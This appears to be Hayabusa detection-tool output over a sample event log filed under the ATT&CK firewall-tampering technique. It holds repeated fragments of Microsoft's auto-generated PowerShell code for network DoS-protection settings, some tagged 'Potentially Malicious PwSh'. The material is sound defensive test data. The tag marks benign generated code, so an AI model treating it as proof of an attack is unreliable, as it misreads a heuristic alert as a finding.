[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterT",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,ype = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefBlockExemptRateLimitBytesPerSec'; 
ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value 
= ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
